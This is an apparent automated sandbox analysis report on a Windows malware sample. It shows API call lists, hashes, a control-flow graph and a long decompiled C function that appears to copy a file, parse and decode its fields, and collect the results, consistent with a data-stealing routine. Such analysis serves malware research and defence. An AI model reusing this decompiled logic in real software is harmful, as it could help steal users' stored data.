                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080E4
                                                                                                                                                                        • LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080ED
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408122
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408129
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408230
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040823F
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040824E
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 00408257
                                                                                                                                                                        • LocalFree.KERNEL32(0000002F,?,?,?,?,?,00409B89,00000001,?), ref: 00408260
                                                                                                                                                                        • lstrcpyn.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 004082CC
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 004082E1
                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00408312
                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00408321
                                                                                                                                                                        • HttpSendRequestW.WININET(?,00000001,00000000), ref: 004083C2
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 004083ED
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004083F9
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00408400
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408422
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 0040845D
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040846E
                                                                                                                                                                        • LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408477
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040847E
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408487
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$Internet$CloseHandle$ByteCharMultiOptionWide$DeleteFileHttpRequestSendlstrcpyn
                                                                                                                                                                        • String ID: /$@iet$pXet$rqwrwqrqwrqw
                                                                                                                                                                        • API String ID: 295309298-1214678537
                                                                                                                                                                        • Opcode ID: cc2c2d685f84a46da143ceb1b72dd46e7f22fcb3915adf77100fbecd680e3ecb
                                                                                                                                                                        • Instruction ID: 6c99c45f28bfee67641de8d5d70fad00062f969ed25daf8f75b78222567e1072
                                                                                                                                                                        • Opcode Fuzzy Hash: cc2c2d685f84a46da143ceb1b72dd46e7f22fcb3915adf77100fbecd680e3ecb
                                                                                                                                                                        • Instruction Fuzzy Hash: 84029F71A00215AFDF04EFB6DE45E6E77B5FB88300F008839E915B7290DB78AD118B68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2222 406d26-406d39 2223 40720c 2222->2223 2224 406d3f-406dae call 40a69e 2222->2224 2225 40720e-407212 2223->2225 2231 406db4-406dc3 2224->2231 2232 4071f7-407205 DeleteFileW 2224->2232 2231->2232 2235 406dc9-406e12 2231->2235 2236 407206 2232->2236 2241 4071c3-4071de CloseHandle DeleteFileW 2235->2241 2242 406e18-406e45 2235->2242 2236->2223 2245 4071e0 2241->2245 2246 4071e7-4071e9 2241->2246 2250 406e83-406e90 2242->2250 2251 406e47-406e62 2242->2251 2245->2246 2248 4071f2-4071f5 2246->2248 2249 4071eb 2246->2249 2248->2225 2249->2248 2255 4071b4-4071ba 2250->2255 2256 406e96-406eae 2250->2256 2251->2250 2254 406e64-406e7e 2251->2254 2254->2236 2255->2241 2260 4071b1 2256->2260 2261 406eb4-406eb6 2256->2261 2260->2255 2262 406ebc-406ed7 2261->2262 2263 4071ae 2261->2263 2262->2263 2267 406edd-406edf 2262->2267 2263->2260 2267->2263 2268 406ee5-406ef2 2267->2268 2270 406ef4-406ef9 2268->2270 2271 406efb 2268->2271 2272 406efd-406f53 call 40a457 2270->2272 2271->2272 2279 407168-407188 2272->2279 2280 406f59-406f92 MultiByteToWideChar 2272->2280 2279->2263 2288 40718a-4071a8 2279->2288 2285 406f94-406fe6 MultiByteToWideChar 2280->2285 2286 406fed-406ffa 2280->2286 2285->2286 2291 407000-407008 2286->2291 2292 40715d 2286->2292 2288->2261 2288->2263 2295 40700e-40701d 2291->2295 2296 40715f 2291->2296 2292->2296 2295->2292 2300 407023-407027 2295->2300 2296->2279 2300->2296 2302 40702d-40704a call 40a457 2300->2302 2302->2296 2306 407050-40707b call 406468 2302->2306 2311 407150 2306->2311 2312 407081-40708b 2306->2312 2313 407152-40715b 2311->2313 2312->2313 2314 407091-4070b0 call 40a457 2312->2314 2313->2296 2314->2313 2319 4070b6-4070d4 call 406468 2314->2319 2323 4070d6-4070da 2319->2323 2324 40713c-40714e 2319->2324 2323->2324 2325 4070dc-407119 lstrlenW 2323->2325 2324->2313 2329 407129-40712b 2325->2329 2330 40711b-407127 call 40a503 2325->2330 2332 407134-40713a 2329->2332 2333 40712d 2329->2333 2330->2329 2332->2324 2333->2332
                                                                                                                                                                        C-Code - Quality: 19%
                                                                                                                                                                        			E00406D26(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, char* _a8) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				void* _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				void* _v68;
                                                                                                                                                                        				void* _v72;
                                                                                                                                                                        				signed int _v76;
                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                        				intOrPtr* _v84;
                                                                                                                                                                        				intOrPtr* _v88;
                                                                                                                                                                        				void* _v92;
                                                                                                                                                                        				intOrPtr _t104;
                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                        				intOrPtr _t106;
                                                                                                                                                                        				intOrPtr _t107;
                                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                                        				void* _t110;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t119;
                                                                                                                                                                        				void* _t121;
                                                                                                                                                                        				void* _t132;
                                                                                                                                                                        				intOrPtr* _t133;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				void* _t142;
                                                                                                                                                                        				char* _t144;
                                                                                                                                                                        				void* _t146;
                                                                                                                                                                        				void* _t147;
                                                                                                                                                                        				void* _t160;
                                                                                                                                                                        				int _t163;
                                                                                                                                                                        				void* _t165;
                                                                                                                                                                        				signed int _t167;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        				void* _t209;
                                                                                                                                                                        				void* _t210;
                                                                                                                                                                        				signed int _t212;
                                                                                                                                                                        				void* _t213;
                                                                                                                                                                        				void* _t214;
                                                                                                                                                                        				void* _t215;
                                                                                                                                                                        				void* _t216;
                                                                                                                                                                        				void* _t228;
                                                                                                                                                                        				void* _t240;
                                                                                                                                                                        				signed int _t241;
                                                                                                                                                                        				void* _t264;
                                                                                                                                                                        				intOrPtr _t265;
                                                                                                                                                                        				void* _t267;
                                                                                                                                                                        				void* _t270;
                                                                                                                                                                        				void* _t271;
                                                                                                                                                                        				intOrPtr _t273;
                                                                                                                                                                        				intOrPtr* _t276;
                                                                                                                                                                        				void* _t278;
                                                                                                                                                                        
                                                                                                                                                                        				_v88 = __edx;
                                                                                                                                                                        				_v84 = __ecx;
                                                                                                                                                                        				if(_a8 == 0) {
                                                                                                                                                                        					L50:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t104 =  *0x40e38c; // 0x645e30
                                                                                                                                                                        				_v76 = _v76 & 0x00000000;
                                                                                                                                                                        				_v48 = _t104;
                                                                                                                                                                        				_t105 =  *0x40e380; // 0x645d40
                                                                                                                                                                        				_v80 = _t105;
                                                                                                                                                                        				_t106 =  *0x40e2cc; // 0x658438
                                                                                                                                                                        				_v52 = _t106;
                                                                                                                                                                        				_t107 =  *0x40e320; // 0x658498
                                                                                                                                                                        				_v56 = _t107;
                                                                                                                                                                        				_t108 =  *0x40e384; // 0x645db8
                                                                                                                                                                        				_v64 = _t108;
                                                                                                                                                                        				_t110 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_v36 = _t111;
                                                                                                                                                                        				_t264 =  *((intOrPtr*)( *0x40e000))(_t110, _a4,  *0x40e300);
                                                                                                                                                                        				_v68 = _t264;
                                                                                                                                                                        				_t113 = E0040A69E( *0x40e000,  &_v36);
                                                                                                                                                                        				_t209 = _v36;
                                                                                                                                                                        				if(_t113 == 0) {
                                                                                                                                                                        					L48:
                                                                                                                                                                        					LocalFree(_t264);
                                                                                                                                                                        					DeleteFileW(_t209);
                                                                                                                                                                        					LocalFree(_t209);
                                                                                                                                                                        					L49:
                                                                                                                                                                        					goto L50;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_t209);
                                                                                                                                                                        				_push(_t264);
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e184))() == 0) {
                                                                                                                                                                        					goto L48;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t119 =  *((intOrPtr*)( *0x40e03c))(_t209, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                        				_v72 = _t119;
                                                                                                                                                                        				_t270 =  *((intOrPtr*)( *0x40e14c))(_t119, 0);
                                                                                                                                                                        				_t121 =  *((intOrPtr*)( *0x40e044))(0x40, _t270);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push( &_v76);
                                                                                                                                                                        				_t18 = _t270 - 1; // -1
                                                                                                                                                                        				_v44 = _t121;
                                                                                                                                                                        				_push(_t121);
                                                                                                                                                                        				_push(_v72);
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e088))() == 0) {
                                                                                                                                                                        					L43:
                                                                                                                                                                        					LocalFree(_v44);
                                                                                                                                                                        					CloseHandle(_v72);
                                                                                                                                                                        					DeleteFileW(_t209);
                                                                                                                                                                        					if(_t264 != 0) {
                                                                                                                                                                        						LocalFree(_t264);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t209 != 0) {
                                                                                                                                                                        						LocalFree(_t209);
                                                                                                                                                                        					}
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t271 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _a4, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        				_t22 = _t271 + 0x40; // 0x40
                                                                                                                                                                        				_t132 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
                                                                                                                                                                        				_v40 = _t132;
                                                                                                                                                                        				if(_t271 == 0) {
                                                                                                                                                                        					L7:
                                                                                                                                                                        					_push(_v40);
                                                                                                                                                                        					_t133 =  *0x40e490; // 0x0
                                                                                                                                                                        					if( *_t133() != 0) {
                                                                                                                                                                        						L42:
                                                                                                                                                                        						 *0x40e4a8();
                                                                                                                                                                        						LocalFree(_v40);
                                                                                                                                                                        						goto L43;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t228 = _v44;
                                                                                                                                                                        					_t265 = _t228;
                                                                                                                                                                        					_push(_t228);
                                                                                                                                                                        					_v32 = _t265;
                                                                                                                                                                        					_t273 = 1;
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e198))() <= 0x200) {
                                                                                                                                                                        						L41:
                                                                                                                                                                        						_t264 = _v68;
                                                                                                                                                                        						goto L42;
                                                                                                                                                                        					}
                                                                                                                                                                        					while(_t273 != 0) {
                                                                                                                                                                        						_v60 = _v60 & 0x00000000;
                                                                                                                                                                        						_t140 =  *((intOrPtr*)( *0x40e00c))(_t265, _v48);
                                                                                                                                                                        						_v20 = _v20 | 0xffffffff;
                                                                                                                                                                        						_t210 = _t140;
                                                                                                                                                                        						_v16 = _v16 | 0xffffffff;
                                                                                                                                                                        						if(_t210 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t211 = _t210 - _t265;
                                                                                                                                                                        						if(_t210 - _t265 < 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t142 =  *((intOrPtr*)( *0x40e00c))(_t265, _v80);
                                                                                                                                                                        						if(_t142 == 0) {
                                                                                                                                                                        							_t273 = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_v20 = _t142 - _t265;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v8 = _t273;
                                                                                                                                                                        						_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
                                                                                                                                                                        						_a8 = _t144;
                                                                                                                                                                        						_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
                                                                                                                                                                        						_v24 = _t146;
                                                                                                                                                                        						_t147 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
                                                                                                                                                                        						_push(_v20);
                                                                                                                                                                        						_v28 = _t147;
                                                                                                                                                                        						if(E0040A457(_t265,  &_a8,  *((intOrPtr*)( *0x40e198))() + _t211, _v48) == 0) {
                                                                                                                                                                        							L38:
                                                                                                                                                                        							LocalFree(_a8);
                                                                                                                                                                        							LocalFree(_v24);
                                                                                                                                                                        							LocalFree(_v28);
                                                                                                                                                                        							_t212 = _v16;
                                                                                                                                                                        							if(_t212 < 0) {
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t265 = _t265 +  *((intOrPtr*)( *0x40e198))(_v64) + _t212;
                                                                                                                                                                        							_push(_t265);
                                                                                                                                                                        							_v32 = _t265;
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e198))() > 0x200) {
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							break;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t160 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
                                                                                                                                                                        							_v12 = _t160;
                                                                                                                                                                        							_t163 = MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, 0, 0);
                                                                                                                                                                        							_v20 = _t163;
                                                                                                                                                                        							if(_t163 != 0) {
                                                                                                                                                                        								_t267 = _t163 + _t163;
                                                                                                                                                                        								_t196 =  *((intOrPtr*)( *0x40e044))(0x40, _t267);
                                                                                                                                                                        								_t216 = _t196;
                                                                                                                                                                        								MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, _t216, _v20);
                                                                                                                                                                        								 *((short*)(_t267 + _t216 - 2)) = 0;
                                                                                                                                                                        								_v12 =  *((intOrPtr*)( *0x40e13c))(_v12, _t216);
                                                                                                                                                                        								LocalFree(_t216);
                                                                                                                                                                        								_t265 = _v32;
                                                                                                                                                                        								_v60 = 1;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t165 =  *((intOrPtr*)( *0x40e00c))(_t265, _v52);
                                                                                                                                                                        							if(_t165 == 0) {
                                                                                                                                                                        								L36:
                                                                                                                                                                        								_t273 = 0;
                                                                                                                                                                        								L37:
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								goto L38;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t273 = _v8;
                                                                                                                                                                        							_t167 = _t165 - _t265;
                                                                                                                                                                        							_v20 = _t167;
                                                                                                                                                                        							if(_t167 < 0) {
                                                                                                                                                                        								goto L37;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t213 =  *((intOrPtr*)( *0x40e00c))(_t265, _v56);
                                                                                                                                                                        							if(_t213 == 0) {
                                                                                                                                                                        								goto L36;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t214 = _t213 - _t265;
                                                                                                                                                                        							if(_t214 >= 0) {
                                                                                                                                                                        								_push(_t214);
                                                                                                                                                                        								if(E0040A457(_t265,  &_v24,  *((intOrPtr*)( *0x40e198))() + _v20, _v52) != 0) {
                                                                                                                                                                        									_v20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
                                                                                                                                                                        									E00406468(_v24,  &_v20);
                                                                                                                                                                        									_t240 =  *((intOrPtr*)( *0x40e00c))(_t265, _v64);
                                                                                                                                                                        									if(_t240 == 0) {
                                                                                                                                                                        										_t273 = 0;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t241 = _t240 - _t265;
                                                                                                                                                                        										_v92 = _t241;
                                                                                                                                                                        										_v16 = _t241;
                                                                                                                                                                        										if(_t241 >= 0) {
                                                                                                                                                                        											_push(_t241);
                                                                                                                                                                        											_v16 = _t241;
                                                                                                                                                                        											if(E0040A457(_t265,  &_v28,  *((intOrPtr*)( *0x40e198))() + _t214, _v56) != 0) {
                                                                                                                                                                        												_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
                                                                                                                                                                        												if(E00406468(_v28,  &_v16) != 0 && _v60 != 0) {
                                                                                                                                                                        													_t190 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        													_t215 = _t190;
                                                                                                                                                                        													_t191 =  *((intOrPtr*)( *0x40e0ec))(_t215,  *0x40e1a4, _v12, _v20, _v16);
                                                                                                                                                                        													_t278 = _t278 + 0x14;
                                                                                                                                                                        													if(_t191 >= lstrlenW( *0x40e1a4)) {
                                                                                                                                                                        														_t276 = _v84;
                                                                                                                                                                        														 *_t276 = E0040A503( *_t276, _t215);
                                                                                                                                                                        													}
                                                                                                                                                                        													if(_t215 != 0) {
                                                                                                                                                                        														LocalFree(_t215);
                                                                                                                                                                        													}
                                                                                                                                                                        													_t265 = _v32;
                                                                                                                                                                        													 *_v88 =  *_v88 + 1;
                                                                                                                                                                        												}
                                                                                                                                                                        												LocalFree(_v16);
                                                                                                                                                                        												_t273 = _v8;
                                                                                                                                                                        												_v16 = _v92;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_v20);
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L37;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t209 = _v36;
                                                                                                                                                                        					goto L41;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_t271);
                                                                                                                                                                        				_push(_t132);
                                                                                                                                                                        				_push(0xffffffff);
                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0xfde9);
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e0e4))() != 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					LocalFree(_v44);
                                                                                                                                                                        					LocalFree(_t264);
                                                                                                                                                                        					LocalFree(_t209);
                                                                                                                                                                        					LocalFree(_v40);
                                                                                                                                                                        					goto L49;
                                                                                                                                                                        				}
                                                                                                                                                                        			}



































































                                                                                                                                                                        0x00406d33
                                                                                                                                                                        0x00406d36
                                                                                                                                                                        0x00406d39
                                                                                                                                                                        0x0040720c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040720c
                                                                                                                                                                        0x00406d3f
                                                                                                                                                                        0x00406d49
                                                                                                                                                                        0x00406d4d
                                                                                                                                                                        0x00406d50
                                                                                                                                                                        0x00406d55
                                                                                                                                                                        0x00406d58
                                                                                                                                                                        0x00406d5d
                                                                                                                                                                        0x00406d60
                                                                                                                                                                        0x00406d65
                                                                                                                                                                        0x00406d68
                                                                                                                                                                        0x00406d6e
                                                                                                                                                                        0x00406d78
                                                                                                                                                                        0x00406d85
                                                                                                                                                                        0x00406d96
                                                                                                                                                                        0x00406d9c
                                                                                                                                                                        0x00406da1
                                                                                                                                                                        0x00406da4
                                                                                                                                                                        0x00406da9
                                                                                                                                                                        0x00406dae
                                                                                                                                                                        0x004071f7
                                                                                                                                                                        0x004071f8
                                                                                                                                                                        0x004071ff
                                                                                                                                                                        0x00407206
                                                                                                                                                                        0x00407206
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407206
                                                                                                                                                                        0x00406dbc
                                                                                                                                                                        0x00406dbd
                                                                                                                                                                        0x00406dbe
                                                                                                                                                                        0x00406dc3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406ddb
                                                                                                                                                                        0x00406de5
                                                                                                                                                                        0x00406df0
                                                                                                                                                                        0x00406df5
                                                                                                                                                                        0x00406e00
                                                                                                                                                                        0x00406e02
                                                                                                                                                                        0x00406e03
                                                                                                                                                                        0x00406e06
                                                                                                                                                                        0x00406e0a
                                                                                                                                                                        0x00406e0b
                                                                                                                                                                        0x00406e12
                                                                                                                                                                        0x004071c3
                                                                                                                                                                        0x004071c6
                                                                                                                                                                        0x004071cf
                                                                                                                                                                        0x004071d6
                                                                                                                                                                        0x004071de
                                                                                                                                                                        0x004071e1
                                                                                                                                                                        0x004071e1
                                                                                                                                                                        0x004071e9
                                                                                                                                                                        0x004071ec
                                                                                                                                                                        0x004071ec
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004071f4
                                                                                                                                                                        0x00406e36
                                                                                                                                                                        0x00406e38
                                                                                                                                                                        0x00406e3e
                                                                                                                                                                        0x00406e40
                                                                                                                                                                        0x00406e45
                                                                                                                                                                        0x00406e83
                                                                                                                                                                        0x00406e83
                                                                                                                                                                        0x00406e86
                                                                                                                                                                        0x00406e90
                                                                                                                                                                        0x004071b4
                                                                                                                                                                        0x004071b4
                                                                                                                                                                        0x004071bd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004071bd
                                                                                                                                                                        0x00406e96
                                                                                                                                                                        0x00406ea0
                                                                                                                                                                        0x00406ea2
                                                                                                                                                                        0x00406ea3
                                                                                                                                                                        0x00406ea6
                                                                                                                                                                        0x00406eae
                                                                                                                                                                        0x004071b1
                                                                                                                                                                        0x004071b1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004071b1
                                                                                                                                                                        0x00406eb4
                                                                                                                                                                        0x00406ec4
                                                                                                                                                                        0x00406ec9
                                                                                                                                                                        0x00406ecb
                                                                                                                                                                        0x00406ecf
                                                                                                                                                                        0x00406ed1
                                                                                                                                                                        0x00406ed7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406edd
                                                                                                                                                                        0x00406edf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406eee
                                                                                                                                                                        0x00406ef2
                                                                                                                                                                        0x00406efb
                                                                                                                                                                        0x00406ef4
                                                                                                                                                                        0x00406ef6
                                                                                                                                                                        0x00406ef6
                                                                                                                                                                        0x00406f09
                                                                                                                                                                        0x00406f0c
                                                                                                                                                                        0x00406f13
                                                                                                                                                                        0x00406f1d
                                                                                                                                                                        0x00406f2c
                                                                                                                                                                        0x00406f2f
                                                                                                                                                                        0x00406f31
                                                                                                                                                                        0x00406f3d
                                                                                                                                                                        0x00406f53
                                                                                                                                                                        0x00407168
                                                                                                                                                                        0x0040716b
                                                                                                                                                                        0x00407174
                                                                                                                                                                        0x0040717d
                                                                                                                                                                        0x00407183
                                                                                                                                                                        0x00407188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407196
                                                                                                                                                                        0x0040719d
                                                                                                                                                                        0x0040719e
                                                                                                                                                                        0x004071a8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406f59
                                                                                                                                                                        0x00406f65
                                                                                                                                                                        0x00406f76
                                                                                                                                                                        0x00406f8b
                                                                                                                                                                        0x00406f8d
                                                                                                                                                                        0x00406f92
                                                                                                                                                                        0x00406f9a
                                                                                                                                                                        0x00406fa0
                                                                                                                                                                        0x00406fab
                                                                                                                                                                        0x00406fc5
                                                                                                                                                                        0x00406fcd
                                                                                                                                                                        0x00406fda
                                                                                                                                                                        0x00406fdd
                                                                                                                                                                        0x00406fe3
                                                                                                                                                                        0x00406fe6
                                                                                                                                                                        0x00406fe6
                                                                                                                                                                        0x00406ff6
                                                                                                                                                                        0x00406ffa
                                                                                                                                                                        0x0040715d
                                                                                                                                                                        0x0040715d
                                                                                                                                                                        0x0040715f
                                                                                                                                                                        0x00407162
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407162
                                                                                                                                                                        0x00407000
                                                                                                                                                                        0x00407003
                                                                                                                                                                        0x00407005
                                                                                                                                                                        0x00407008
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407019
                                                                                                                                                                        0x0040701d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407023
                                                                                                                                                                        0x00407027
                                                                                                                                                                        0x00407032
                                                                                                                                                                        0x0040704a
                                                                                                                                                                        0x00407064
                                                                                                                                                                        0x00407067
                                                                                                                                                                        0x00407077
                                                                                                                                                                        0x0040707b
                                                                                                                                                                        0x00407150
                                                                                                                                                                        0x00407081
                                                                                                                                                                        0x00407081
                                                                                                                                                                        0x00407085
                                                                                                                                                                        0x00407088
                                                                                                                                                                        0x0040708b
                                                                                                                                                                        0x00407096
                                                                                                                                                                        0x0040709a
                                                                                                                                                                        0x004070b0
                                                                                                                                                                        0x004070ca
                                                                                                                                                                        0x004070d4
                                                                                                                                                                        0x004070e8
                                                                                                                                                                        0x004070f3
                                                                                                                                                                        0x00407108
                                                                                                                                                                        0x0040710a
                                                                                                                                                                        0x00407119
                                                                                                                                                                        0x0040711b
                                                                                                                                                                        0x00407127
                                                                                                                                                                        0x00407127
                                                                                                                                                                        0x0040712b
                                                                                                                                                                        0x0040712e
                                                                                                                                                                        0x0040712e
                                                                                                                                                                        0x00407137
                                                                                                                                                                        0x0040713a
                                                                                                                                                                        0x0040713a
                                                                                                                                                                        0x0040713f
                                                                                                                                                                        0x00407148
                                                                                                                                                                        0x0040714b
                                                                                                                                                                        0x0040714b
                                                                                                                                                                        0x004070b0
                                                                                                                                                                        0x0040708b
                                                                                                                                                                        0x00407155
                                                                                                                                                                        0x00407155
                                                                                                                                                                        0x0040704a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407027
                                                                                                                                                                        0x00406f53
                                                                                                                                                                        0x004071ae
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004071ae
                                                                                                                                                                        0x00406e4f
                                                                                                                                                                        0x00406e50
                                                                                                                                                                        0x00406e51
                                                                                                                                                                        0x00406e52
                                                                                                                                                                        0x00406e53
                                                                                                                                                                        0x00406e55
                                                                                                                                                                        0x00406e58
                                                                                                                                                                        0x00406e59
                                                                                                                                                                        0x00406e62
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406e64
                                                                                                                                                                        0x00406e67
                                                                                                                                                                        0x00406e6e
                                                                                                                                                                        0x00406e75
                                                                                                                                                                        0x00407206
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407206

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406E67
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406E6E
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406E75
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,00000000), ref: 00406F8B
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,000000FF), ref: 00406FC5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406FDD
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004071C6
